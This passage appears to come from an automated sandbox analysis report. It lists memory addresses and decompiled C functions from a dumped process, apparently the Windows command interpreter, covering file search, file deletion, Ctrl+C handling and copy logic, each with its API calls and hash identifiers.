                                              0x002ad855
                                              0x002ad871
                                              0x002ad873
                                              0x002ad877
                                              0x002ad857
                                              0x002ad861
                                              0x002ad86b
                                              0x002ad91b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002ad86b
                                              0x002ad87e
                                              0x002ad883
                                              0x002ad888
                                              0x002ad921
                                              0x002ad924
                                              0x002ad932
                                              0x002ad932
                                              0x002ad926
                                              0x002ad926
                                              0x002ad894
                                              0x002ad895
                                              0x002ad89a
                                              0x002ad89f
                                              0x002bba09
                                              0x002bba09
                                              0x002ad8ac
                                              0x002ad8d7
                                              0x002ad8dc
                                              0x002ad8ae
                                              0x002ad8b0
                                              0x002ad8c0
                                              0x002ad8ca
                                              0x002ad8e2
                                              0x002ad8e5
                                              0x002ad8ea
                                              0x002ad8ec
                                              0x002bba13
                                              0x002bba1f
                                              0x002bba25
                                              0x002bba26
                                              0x002bba26
                                              0x002bba28
                                              0x002ada46
                                              0x002ada46
                                              0x002ada49
                                              0x002ada4b
                                              0x002ada4d
                                              0x00000000
                                              0x00000000
                                              0x002ad9f1
                                              0x002ad9f4
                                              0x002ad9f6
                                              0x002ad9f9
                                              0x002ad9f9
                                              0x002ad9fc
                                              0x002ad9ff
                                              0x002ad9ff
                                              0x002ada08
                                              0x002ada10
                                              0x002ada14
                                              0x002ada19
                                              0x002ada1c
                                              0x002ada1e
                                              0x002ada21
                                              0x002ada23
                                              0x002ada26
                                              0x002ada26
                                              0x002ada29
                                              0x002ada2c
                                              0x002ada2c
                                              0x002ada35
                                              0x002ada36
                                              0x002ada39
                                              0x002ada3b
                                              0x002ada40
                                              0x00000000
                                              0x00000000
                                              0x002ada40
                                              0x002ada39
                                              0x002ada1c
                                              0x002ada4f
                                              0x002ada55
                                              0x002ada5b
                                              0x002ada5e
                                              0x002bba31
                                              0x002bba36
                                              0x00000000
                                              0x002ada64
                                              0x002ada66
                                              0x002ada67
                                              0x002ada6c
                                              0x002ada72
                                              0x002ada74
                                              0x002adb8d
                                              0x002adb8f
                                              0x002ada7a
                                              0x002ada80
                                              0x002ada83
                                              0x002ada88
                                              0x002ada8b
                                              0x002ada8d
                                              0x002ada8d
                                              0x002ada90
                                              0x002ada92
                                              0x002ada98
                                              0x002ada98
                                              0x002ada9b
                                              0x002ada9b
                                              0x002ada9e
                                              0x00000000
                                              0x002adaa4
                                              0x002adaa6
                                              0x002adaad
                                              0x002adaaf
                                              0x002bba90
                                              0x002bba90
                                              0x00000000
                                              0x002adab5
                                              0x002adab7
                                              0x002adabe
                                              0x002adac1
                                              0x00000000
                                              0x002adac7
                                              0x002adac9
                                              0x002adace
                                              0x002adad0
                                              0x002bba43
                                              0x002bba48
                                              0x002bba4a
                                              0x00000000
                                              0x002bba50
                                              0x002bba56
                                              0x002bba5c
                                              0x002bba5e
                                              0x002bba64
                                              0x002bba66
                                              0x00000000
                                              0x002bba6c
                                              0x002bba7e
                                              0x002bba83
                                              0x002bba84
                                              0x002bba86
                                              0x00000000
                                              0x002bba86
                                              0x002bba66
                                              0x002adad6
                                              0x002adad6
                                              0x002adad6
                                              0x002adad8
                                              0x002adadd
                                              0x002adae0
                                              0x002adae2
                                              0x002bbb36
                                              0x002bbb3b
                                              0x002bbb3c
                                              0x002bbb3e
                                              0x002bbb43
                                              0x002bbb43
                                              0x002bbb4b
                                              0x002bbb4e
                                              0x00000000
                                              0x002adae8
                                              0x002adaea
                                              0x002adaef
                                              0x002adaef
                                              0x002adaf2
                                              0x002adaf6
                                              0x002adb6f
                                              0x002adb76
                                              0x002adb7c
                                              0x002adb7f
                                              0x002adb84
                                              0x002adb86
                                              0x00000000
                                              0x002adb88
                                              0x00000000
                                              0x002adb88
                                              0x002adaf8
                                              0x002adaf8
                                              0x002adafd
                                              0x002adafe
                                              0x002bba98
                                              0x002bba9d
                                              0x002bbaa2
                                              0x002bbaa8
                                              0x002bbaaa
                                              0x00000000
                                              0x002bbab0
                                              0x002bbab5
                                              0x002bbaba
                                              0x002bbabc
                                              0x00000000
                                              0x002bbac2
                                              0x002bbac2
                                              0x002bbac5
                                              0x002bbac7
                                              0x002bbac9
                                              0x002bbac9
                                              0x002bbad9
                                              0x002bbadf
                                              0x002bbae1
                                              0x00000000
                                              0x002bbae7
                                              0x002bbae7
                                              0x002bbaea
                                              0x002bbaec
                                              0x002bbaee
                                              0x002bbaee
                                              0x002bbaf4
                                              0x002bbaf5
                                              0x00000000
                                              0x002bbaf5
                                              0x002bbae1
                                              0x002bbabc
                                              0x002adb04
                                              0x002adb09
                                              0x002adb11
                                              0x002adb11
                                              0x002adb17
                                              0x002adb17
                                              0x002adb1c
                                              0x002adb22
                                              0x002adb24
                                              0x002bbb89
                                              0x002bbb89
                                              0x002bbb94
                                              0x00000000
                                              0x002adb2a
                                              0x002adb2a
                                              0x002adb2a
                                              0x002adb2c
                                              0x002bbaff
                                              0x002bbb03
                                              0x002bbb08
                                              0x002bbb0e
                                              0x002bbb10
                                              0x002bbb15
                                              0x002bbb18
                                              0x002bbb58
                                              0x002bbb58
                                              0x002bbb6f
                                              0x002bbb7c
                                              0x00000000
                                              0x002bbb1a
                                              0x002bbb1a
                                              0x002bbb1c
                                              0x00000000
                                              0x002bbb1c
                                              0x002adb32
                                              0x002adb32
                                              0x002adb32
                                              0x002adb34
                                              0x00000000
                                              0x002adb3a
                                              0x002adb40
                                              0x00000000
                                              0x002adb40
                                              0x002adb34
                                              0x002adb2c
                                              0x002adb24
                                              0x002adafe
                                              0x002adaf6
                                              0x002adae2
                                              0x002adad0
                                              0x002adac1
                                              0x002adaaf
                                              0x00000000
                                              0x002adb43
                                              0x002adb43
                                              0x002adb46
                                              0x002adb48
                                              0x002adb48
                                              0x002ada9b
                                              0x002ada92
                                              0x002ada74
                                              0x002adb50
                                              0x002adb53
                                              0x002adb5f
                                              0x002adb60
                                              0x002adb61
                                              0x002adb63
                                              0x002adb6c
                                              0x00000000
                                              0x002adb6c
                                              0x002ad8f2
                                              0x002ad8fb
                                              0x002ad8fe
                                              0x002ad905
                                              0x002ad906
                                              0x002ad90b
                                              0x002ad90e
                                              0x002ad910
                                              0x002ad912
                                              0x002ad912
                                              0x00000000
                                              0x002ad910
                                              0x002ad8cc
                                              0x002ad8d2
                                              0x00000000
                                              0x002ad8d2
                                              0x002ad8ca
                                              0x002ad8ac
                                              0x00000000

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: _wcsicmp
                                              • String ID: ELSE$IF/?
                                              • API String ID: 2081463915-1134991328
                                              • Opcode ID: a9c801e6c6bf3c9ef0f00132e4cd5c330ac8975709c9ca30ebe2d5466435dd86
                                              • Instruction ID: 9371da29b316d25c963ccb6f7c1ef95a0db085722c2787af73917f609cf57867
                                              • Opcode Fuzzy Hash: a9c801e6c6bf3c9ef0f00132e4cd5c330ac8975709c9ca30ebe2d5466435dd86
                                              • Instruction Fuzzy Hash: 3B61F5316303029BDB259F35ED4976AB3A1AF86360B24456BE407D7AE1EFB1DC61CB40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002B68BA, Relevance: 15.1, APIs: 10, Instructions: 114memoryfileCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 54%
                                              			E002B68BA(intOrPtr* __ecx, WCHAR* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12, void** _a16) {
				signed int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t18;
				void* _t22;
				void* _t24;
				int _t28;
				void* _t40;
				void* _t41;
				void* _t47;
				void* _t50;
				void* _t51;
				void** _t53;
				void* _t54;
				signed int _t55;

				_t48 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t18 =  *0x2cd0b4; // 0x40f69e4c
				_v8 = _t18 ^ _t55;
				_v12 = __ecx;
				_t40 = 0;
				_t22 = FindFirstFileExW(__edx, 0 | _a8 == 0x00000000, _a12, 0, 0, 2);
				_t53 = _a16;
				_t50 = _t22;
				 *_t53 = _t50;
				while(_t50 != 0xffffffff) {
					_push(_a4);
					_push(_a12);
					if(_v12 != E002B6A00) {
						 *0x2e94b4();
						_t28 =  *_v12();
						_t50 =  *_t53;
					} else {
						_t28 = E002B6A00();
					}
					if(_t28 == 0) {
						if(FindNextFileW(_t50, _a12) == 0) {
							FindClose( *_t53);
							 *_t53 =  *_t53 | 0xffffffff;
							_t50 = _t50 | 0xffffffff;
							goto L6;
						} else {
							_t50 =  *_t53;
							continue;
						}
					} else {
						 *0x2e3cf0 =  *0x2e3cf0 & 0x00000000;
						_t40 = 1;
						L6:
						if(_t50 == 0xffffffff) {
							L12:
							if(_t40 == 0) {
								break;
							}
							L13:
							_t24 = _t40;
						} else {
							_t47 =  *0x2e3cf4;
							if(_t47 == 0) {
								_t47 = HeapAlloc(GetProcessHeap(), 0, 0x14);
								goto L17;
							} else {
								_t48 =  *0x2cd5dc; // 0x0
								if(_t48 >=  *0x2e3cf8) {
									_t47 = HeapReAlloc(GetProcessHeap(), 0, _t47, 4 + _t48 * 4);
									if(_t47 == 0) {
										 *0x2e3cf0 = GetLastError();
										FindClose( *_t53);
										 *_t53 =  *_t53 | 0xffffffff;
										_t24 = 0;
									} else {
										 *0x2e3cf8 =  *0x2e3cf8 + 1;
										L17:
										_t48 =  *0x2cd5dc; // 0x0
										 *0x2e3cf4 = _t47;
										goto L9;
									}
								} else {
									L9:
									if(_t47 != 0) {
										 *(_t47 + _t48 * 4) =  *_t53;
										 *0x2cd5dc = _t48;
									}
									_t40 = 1;
									goto L12;
								}
							}
						}
					}
					_pop(_t51);
					_pop(_t54);
					_pop(_t41);
					return E002B6FD0(_t24, _t41, _v8 ^ _t55, _t48, _t51, _t54);
				}
				 *0x2e3cf0 = GetLastError();
				goto L13;
			}




















                                              0x002b68ba
                                              0x002b68bf
                                              0x002b68c0
                                              0x002b68c1
                                              0x002b68c8
                                              0x002b68d4
                                              0x002b68dc
                                              0x002b68e6
                                              0x002b68ec
                                              0x002b68ef
                                              0x002b68f1
                                              0x002b68f3
                                              0x002b68f8
                                              0x002b68fe
                                              0x002b6906
                                              0x002b699a
                                              0x002b69a3
                                              0x002b69a5
                                              0x002b690c
                                              0x002b690c
                                              0x002b690c
                                              0x002b6913
                                              0x002b69e2
                                              0x002b69ed
                                              0x002b69f3
                                              0x002b69f6
                                              0x00000000
                                              0x002b69e4
                                              0x002b69e4
                                              0x00000000
                                              0x002b69e4
                                              0x002b6919
                                              0x002b6919
                                              0x002b6920
                                              0x002b6922
                                              0x002b6925
                                              0x002b6951
                                              0x002b6953
                                              0x00000000
                                              0x00000000
                                              0x002b6955
                                              0x002b6955
                                              0x002b6927
                                              0x002b6927
                                              0x002b692f
                                              0x002b6988
                                              0x00000000
                                              0x002b6931
                                              0x002b6931
                                              0x002b693d
                                              0x002b69c4
                                              0x002b69c8
                                              0x002c154f
                                              0x002c1554
                                              0x002c155a
                                              0x002c155d
                                              0x002b69ce
                                              0x002b69ce
                                              0x002b698a
                                              0x002b698a
                                              0x002b6990
                                              0x00000000
                                              0x002b6990
                                              0x002b693f
                                              0x002b693f
                                              0x002b6941
                                              0x002b6945
                                              0x002b6949
                                              0x002b6949
                                              0x002b694f
                                              0x00000000
                                              0x002b694f
                                              0x002b693d
                                              0x002b692f
                                              0x002b6925
                                              0x002b695a
                                              0x002b695b
                                              0x002b695e
                                              0x002b6967
                                              0x002b6967
                                              0x002b6970
                                              0x00000000

                                              APIs
                                              • FindFirstFileExW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000037,00000000,00000000,00000002,00000000,?,00000000,002B6A00,002B6A00,?,002AAE4F,00000037,00000000,?), ref: 002B68E6
                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,002AAE4F,00000037,00000000,?,?), ref: 002B696A
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000014,?,002AAE4F,00000037,00000000,?,?), ref: 002B697B
                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,002AAE4F,00000037,00000000,?,?), ref: 002B6982
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,002AAE4F,00000037,00000000,?,?), ref: 002B69B7
                                              • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,002AAE4F,00000037,00000000,?,?), ref: 002B69BE
                                              • FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000037,?,002AAE4F,00000037,00000000,?,?), ref: 002B69DA
                                              • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(002AAE4F,?,002AAE4F,00000037,00000000,?,?), ref: 002B69ED
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: Heap$Find$AllocFileProcess$CloseErrorFirstLastNext
                                              • String ID:
                                              • API String ID: 1047556133-0
                                              • Opcode ID: 49e70f9daa0de33d47666cec508296b472e4095feb29bcf37414aac2519aba16
                                              • Instruction ID: 9e773b17992f8237c67c4c3ea0332b94f134963906a58327c071a39966129ea0
                                              • Opcode Fuzzy Hash: 49e70f9daa0de33d47666cec508296b472e4095feb29bcf37414aac2519aba16
                                              • Instruction Fuzzy Hash: A141F430250242AFCB148F24EC4DBF93BA5FB48361F20062AE996DB2E0DB349861DF10
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002A83F2, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 82filenativeCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 72%
                                              			E002A83F2(WCHAR* __ecx, signed int __edx) {
				void* _v8;
				void* _v16;
				void* _v24;
				long _v32;
				char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void* _v64;
				struct _EXCEPTION_RECORD _t30;
				long _t31;
				long _t35;
				WCHAR* _t41;
				char* _t43;
				long _t47;
				void* _t49;

				_t47 = 0;
				_t41 = __ecx;
				if((__edx & 0x00000400) != 0) {
					L11:
					if(DeleteFileW(_t41) == 0) {
						_t47 = GetLastError();
					}
					L8:
					return _t47;
				}
				_v8 = _v8 | 0xffffffff;
				_t30 =  &_v16;
				__imp__RtlDosPathNameToRelativeNtPathName_U_WithStatus(__ecx, _t30, 0,  &_v40);
				if(_t30 < 0) {
					goto L11;
				}
				if(_v40 > 0) {
					_t31 = _v32;
					_t43 =  &_v40;
				} else {
					_t31 = 0;
					_t43 =  &_v16;
					_v32 = 0;
				}
				_v60 = _t31;
				_v64 = 0x18;
				_v52 = 0x40;
				_v56 = _t43;
				_v48 = _t47;
				_v44 = _t47;
				_t35 = NtOpenFile( &_v8, 0x10000,  &_v64,  &_v24, 4, 0x5040);
				__imp__RtlReleaseRelativeName( &_v40);
				RtlFreeUnicodeString( &_v16);
				if(_t35 < 0) {
					goto L11;
				} else {
					if(E002A84BE(_v8) != 0) {
						_t49 = E002C9AB4(_v8);
					} else {
						_t49 = 1;
					}
					CloseHandle(_v8);
					if(_t49 == 0) {
						goto L11;
					} else {
						goto L8;
					}
				}
			}





















                                              0x002a83fd
                                              0x002a83ff
                                              0x002a8407
                                              0x002c036d
                                              0x002c0376
                                              0x002c0382
                                              0x002c0382
                                              0x002a84b5
                                              0x002a84bd
                                              0x002a84bd
                                              0x002a840d
                                              0x002a8416
                                              0x002a841b
                                              0x002a8423
                                              0x00000000
                                              0x00000000
                                              0x002a842d
                                              0x002c0353
                                              0x002c0356
                                              0x002a8433
                                              0x002a8433
                                              0x002a8435
                                              0x002a8438
                                              0x002a8438
                                              0x002a8440
                                              0x002a844c
                                              0x002a845c
                                              0x002a8464
                                              0x002a8467
                                              0x002a846a
                                              0x002a846d
                                              0x002a8479
                                              0x002a8483
                                              0x002a848b
                                              0x00000000
                                              0x002a8491
                                              0x002a849b
                                              0x002c0366
                                              0x002a84a1
                                              0x002a84a3
                                              0x002a84a3
                                              0x002a84a7
                                              0x002a84af
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002a84af

                                              APIs
                                              • RtlDosPathNameToRelativeNtPathName_U_WithStatus.NTDLL ref: 002A841B
                                              • NtOpenFile.NTDLL ref: 002A846D
                                              • RtlReleaseRelativeName.NTDLL ref: 002A8479
                                              • RtlFreeUnicodeString.NTDLL(?), ref: 002A8483
                                                • Part of subcall function 002A84BE: NtQueryVolumeInformationFile.NTDLL ref: 002A84EA
                                              • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(000000FF), ref: 002A84A7
                                              • DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000001), ref: 002C036E
                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,002A8393), ref: 002C037C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: File$NamePathRelative$CloseDeleteErrorFreeHandleInformationLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
                                              • String ID: @
                                              • API String ID: 2968197161-2766056989
                                              • Opcode ID: fac0677df64c58e0612aeb2a32c0d21591bb8a93a5ff0fc999aba46796cba6f3
                                              • Instruction ID: d9214d1bdbff9dac581a7fe800a410bbf8325b99e4d9e71339d6ae73c76dc09e
                                              • Opcode Fuzzy Hash: fac0677df64c58e0612aeb2a32c0d21591bb8a93a5ff0fc999aba46796cba6f3
                                              • Instruction Fuzzy Hash: 2C218271D10249EBCB10DFA1EC88ADEBBBCFB48710F10415AEA15E7250EB709E05CB60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002C6D90, Relevance: 13.6, APIs: 9, Instructions: 67filenativeCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 31%
                                              			E002C6D90(void* __edi, intOrPtr _a4) {
				char _v12;
				void* __ecx;
				int _t4;
				void* _t6;
				void* _t7;
				struct _IO_FILE* _t10;
				void* _t13;
				void* _t16;

				_t16 = __edi;
				_push(_t13);
				_push(_t13);
				if(_a4 == 0 || _a4 == 1) {
					EnterCriticalSection( *0x2d3858);
					 *0x2cd544 = 1;
					LeaveCriticalSection( *0x2d3858);
					if( *0x2cd0db != 0 &&  *0x2e3cc4 != 0) {
						_push("^C");
						_t10 = E002B7721(_t4, 2);
						_pop(_t13);
						_t4 = fflush(E002B7721(fprintf(_t10, ??), 2));
					}
					if( *0x2db938 != 0xffffffff) {
						__imp__TryAcquireSRWLockExclusive(0x2e7f20, _t16);
						if(_t4 != 0) {
							__imp__NtCancelSynchronousIoFile( *0x2db938, 0,  &_v12);
							__imp__ReleaseSRWLockExclusive(0x2e7f20);
						}
					}
					if(E002B7797(_t13) == 0) {
						_t7 = E002B0178(_t5);
						if(_t7 != 0) {
							__imp___get_osfhandle(0);
							FlushConsoleInputBuffer(_t7);
						}
					}
					_t6 = 1;
				} else {
					_t6 = 0;
				}
				return _t6;
			}











                                              0x002c6d90
                                              0x002c6d95
                                              0x002c6d96
                                              0x002c6d9f
                                              0x002c6db3
                                              0x002c6dbf
                                              0x002c6dc5
                                              0x002c6dd2
                                              0x002c6ddd
                                              0x002c6de4
                                              0x002c6de9
                                              0x002c6df9
                                              0x002c6dff
                                              0x002c6e09
                                              0x002c6e12
                                              0x002c6e1a
                                              0x002c6e28
                                              0x002c6e2f
                                              0x002c6e2f
                                              0x002c6e35
                                              0x002c6e3d
                                              0x002c6e41
                                              0x002c6e48
                                              0x002c6e4c
                                              0x002c6e54
                                              0x002c6e54
                                              0x002c6e48
                                              0x002c6e5a
                                              0x002c6da6
                                              0x002c6da6
                                              0x002c6da6
                                              0x002c6e60

                                              APIs
                                              • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 002C6DB3
                                              • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 002C6DC5
                                              • fprintf.MSVCRT ref: 002C6DEB
                                              • fflush.MSVCRT ref: 002C6DF9
                                              • TryAcquireSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(002E7F20), ref: 002C6E12
                                              • NtCancelSynchronousIoFile.NTDLL(00000000,00000000), ref: 002C6E28
                                              • ReleaseSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(002E7F20), ref: 002C6E2F
                                              • _get_osfhandle.MSVCRT ref: 002C6E4C
                                              • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 002C6E54
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: CriticalExclusiveLockSection$AcquireBufferCancelConsoleEnterFileFlushInputLeaveReleaseSynchronous_get_osfhandlefflushfprintf
                                              • String ID:
                                              • API String ID: 3139166086-0
                                              • Opcode ID: eaad50d4b874fc7a2631c1de62744bbd62128c1505d3b2f67a77720f4ab04d7d
                                              • Instruction ID: fa9b31120d0c5258869b0af0a6ee428ff6202c931581b2fd50b4c48f5dabb1f0
                                              • Opcode Fuzzy Hash: eaad50d4b874fc7a2631c1de62744bbd62128c1505d3b2f67a77720f4ab04d7d
                                              • Instruction Fuzzy Hash: F11126315A4240BFDF11AF64FC8DFAA7B68EB45752F04011FF905951B1CB7148A1DB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002B5FC8, Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 372COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 92%
                                              			E002B5FC8(void* __ecx, void* __edx, intOrPtr _a4, signed int _a8, WCHAR* _a12, signed int _a16, intOrPtr* _a20, intOrPtr* _a24) {
				signed int _v8;
				int _v20;
				char _v24;
				int _v28;
				void _v548;
				intOrPtr _v552;
				int _v556;
				intOrPtr* _v560;
				WCHAR* _v564;
				intOrPtr* _v568;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t84;
				short _t95;
				short _t97;
				void* _t98;
				intOrPtr _t100;
				signed int _t112;
				signed int _t113;
				long _t118;
				signed int _t120;
				void* _t121;
				short _t122;
				signed char _t124;
				void* _t125;
				long _t126;
				void* _t127;
				short _t128;
				long _t136;
				signed short* _t137;
				short _t146;
				short _t147;
				void* _t148;
				signed int _t150;
				signed int _t153;
				signed int _t154;
				signed int _t155;
				short _t156;
				signed int _t161;
				WCHAR* _t162;
				intOrPtr* _t163;
				short* _t169;
				long _t170;
				short* _t171;
				signed int _t177;
				short _t178;
				WCHAR* _t182;
				WCHAR* _t183;
				signed int _t187;
				WCHAR* _t188;
				WCHAR* _t199;
				short* _t202;
				void* _t205;
				signed int _t206;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				long _t219;
				signed int _t220;
				void* _t222;
				void* _t223;
				short _t227;
				void* _t228;
				WCHAR* _t229;
				void* _t232;
				WCHAR* _t233;
				signed int _t235;
				intOrPtr* _t239;
				short* _t241;
				void* _t242;
				WCHAR* _t244;
				signed int _t246;
				short* _t248;
				WCHAR* _t250;
				signed int _t251;
				signed int _t252;
				WCHAR* _t254;
				void* _t258;
				intOrPtr _t259;
				signed int _t260;

				_t84 =  *0x2cd0b4; // 0x40f69e4c
				_v8 = _t84 ^ _t260;
				_v552 = _a4;
				_v564 = _a12;
				_v560 = _a20;
				_t232 = __edx;
				_v568 = _a24;
				E002B62FA(E002B3320(L"COPYCMD"), _t232);
				_v556 = 0;
				_t162 = E002AEA40( *((intOrPtr*)(__ecx + 0x3c)), 0, 0);
				if(E002B62FA(_t162, _t232) == 0) {
					L2:
					_t250 = _t162;
					_t217 = 0;
					_t12 =  &(_t250[1]); // 0x0
					_t169 = _t12;
					do {
						_t95 =  *_t250;
						_t250 =  &(_t250[1]);
					} while (_t95 != 0);
					_t251 = _t250 - _t169;
					_t252 = _t251 >> 1;
					if(_t251 == 0) {
						L46:
						_t170 = 0x232a;
						L48:
						E002C5CEA(_t162, _t170, _t217, __eflags);
						L49:
						_t170 = 0x232e;
						goto L48;
					}
					if(_t252 >= 0x7fe7) {
						goto L49;
					}
					_t233 = _t162;
					_t13 =  &(_t233[1]); // 0x0
					_t171 = _t13;
					do {
						_t97 =  *_t233;
						_t233 =  &(_t233[1]);
					} while (_t97 != 0);
					_t235 = _t233 - _t171 >> 1;
					_t98 = E002B22C0(_t162, _t162);
					_t14 = _t235 + 1; // -3
					_t217 = _t14;
					E002B1040(_t162, _t14, _t98);
					_t100 = E002B3B5D(_t162, _t14);
					 *_v560 = _t100;
					if(_t100 == 1) {
						_t170 =  *0x2e3cf0;
						goto L48;
					}
					_v24 = 1;
					_v28 = 0;
					_v20 = 0x104;
					memset( &_v548, 0, 0x104);
					if(E002B0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
						_t170 = 0x2374;
						goto L48;
					}
					_t254 =  &(_t162[_t252 + 1]);
					if( *_t254 == 0) {
						_t177 = _v28;
						__eflags = _t177;
						if(_t177 == 0) {
							_t177 =  &_v548;
						}
						 *_t177 =  *((intOrPtr*)( *0x2e3cec));
						_t112 = _v28;
						__eflags = _t112;
						if(_t112 == 0) {
							_t112 =  &_v548;
						}
						_t178 = 0x3a;
						 *((short*)(_t112 + 2)) = _t178;
						_t113 = _v28;
						__eflags = _t113;
						if(_t113 == 0) {
							_t113 =  &_v548;
						}
						 *((short*)(_t113 + 4)) = 0;
						L19:
						_t238 = _a8;
						_t217 = _a8;
						_t255 = _v552;
						if(E002B2D22(_v552, _t238, _t162) != 0) {
							goto L49;
						}
						_t163 = _v560;
						if(( *( *( *_t163 + 0x18)) & 0x00000010) == 0) {
							_t222 = 0x5c;
							_t258 = E002B2349(_t255, _t222);
							if(_t258 == 0) {
								_t259 = _v552;
							} else {
								_t259 = _t258 + 2;
							}
							_t223 = 0x5c;
							if(E002B2349( *((intOrPtr*)( *_t163 + 0x10)), _t223) == 0) {
								_t139 =  *((intOrPtr*)( *_t163 + 0x10));
							}
							E002B1040(_t259, _t238 - (_t259 - _v552 >> 1), _t139);
						}
						_t117 = _v28;
						if(_v28 == 0) {
							_t117 =  &_v548;
						}
						_t162 = _v564;
						_t217 = _a16;
						_t118 = E002B2D22(_t162, _a16, _t117);
						if(_t118 != 0) {
							goto L49;
						} else {
							_t256 = _t118;
							 *0x2e3cf0 = _t118;
							SetLastError(_t118);
							_t239 = _v568;
							_t182 = _t162;
							 *_t239 = 0;
							_t120 =  *_t162 & 0x0000ffff;
							_t217 = _t120;
							if(_t120 == 0) {
								L32:
								_t121 = 0x5c;
								if(_t217 == _t121) {
									_t183 = _t162;
									_t256 = 1;
									__eflags = 1;
									_t217 =  &(_t183[1]);
									do {
										_t122 =  *_t183;
										_t183 =  &(_t183[1]);
										__eflags = _t122 - _v556;
									} while (_t122 != _v556);
									 *((short*)(_t162 + (_t183 - _t217 >> 1) * 2 - 2)) = 0;
								}
								_t124 = GetFileAttributesW(_t162);
								if(_t124 != 0xffffffff) {
									__eflags = _t124 & 0x00000010;
									if((_t124 & 0x00000010) != 0) {
										 *_t239 = 1;
										_t256 = 1;
									}
									L36:
									if(_t256 != 0) {
										_t125 = 0x5c;
										_t126 = E002B2349(_v552, _t125);
										_t256 = _t126;
										__eflags = 0;
										_t219 = _t126;
										_t49 = _t219 + 2; // 0x2
										_t127 = _t49;
										do {
											_t187 =  *_t219;
											_t219 = _t219 + 2;
											__eflags = _t187;
										} while (_t187 != 0);
										_t188 = _t162;
										_t220 = _t219 - _t127;
										__eflags = _t220;
										_t217 = _t220 >> 1;
										_t241 =  &(_t188[1]);
										do {
											_t128 =  *_t188;
											_t188 =  &(_t188[1]);
											__eflags = _t128 - _v556;
										} while (_t128 != _v556);
										_t52 = _t217 + 1; // -1
										__eflags = _t52 + (_t188 - _t241 >> 1) - 0x7fe7;
										if(__eflags > 0) {
											goto L49;
										}
										_t217 = _a16;
										E002B18C0(_t162, _a16, _t256);
									}
									__imp__??_V@YAXPAX@Z(_v28);
									_pop(_t242);
									return E002B6FD0(0, _t162, _v8 ^ _t260, _t217, _t242, _t256);
								}
								_t136 = GetLastError();
								 *0x2e3cf0 = _t136;
								if(_t136 == 0 || _t136 == 2) {
									goto L36;
								} else {
									__eflags = _t136 - 3;
									if(__eflags == 0) {
										goto L36;
									}
									_t170 = _t136;
									goto L48;
								}
							}
							do {
								_t137 = _t182;
								_t182 =  &(_t182[1]);
							} while ( *_t182 != 0);
							_t217 =  *_t137 & 0x0000ffff;
							goto L32;
						}
					}
					_t199 = _t254;
					if( *((intOrPtr*)(E002AD7E6(_t199))) != 0) {
						goto L46;
					}
					_t217 =  &(_t199[1]);
					do {
						_t146 =  *_t199;
						_t199 =  &(_t199[1]);
					} while (_t146 != 0);
